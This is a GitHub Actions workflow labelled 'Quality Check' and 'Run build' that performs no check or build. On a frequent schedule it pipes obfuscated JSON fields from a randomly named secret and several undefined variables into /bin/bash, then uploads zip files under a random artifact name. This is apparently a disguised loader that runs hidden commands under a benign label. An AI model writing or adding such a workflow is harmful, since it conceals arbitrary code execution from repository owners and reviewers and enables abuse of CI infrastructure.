name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '52 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          jqmgs70911: ${{ secrets.jqmgs70911 }}
        run: |
          printf '%s' "$jqmgs70911" | jq -r .m5899 | /bin/bash
          printf '%s' "$x9" | jq -r .f70 | /bin/bash
          printf '%s' "$hr44" | jq -r .uqbio7 | /bin/bash
          echo $cb4 | jq -r .oo57455 | /bin/bash
          echo $kz014 | jq -r .fxebz68597 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: D6R3PAsH
          path: "*.zip"
          retention-days: 1
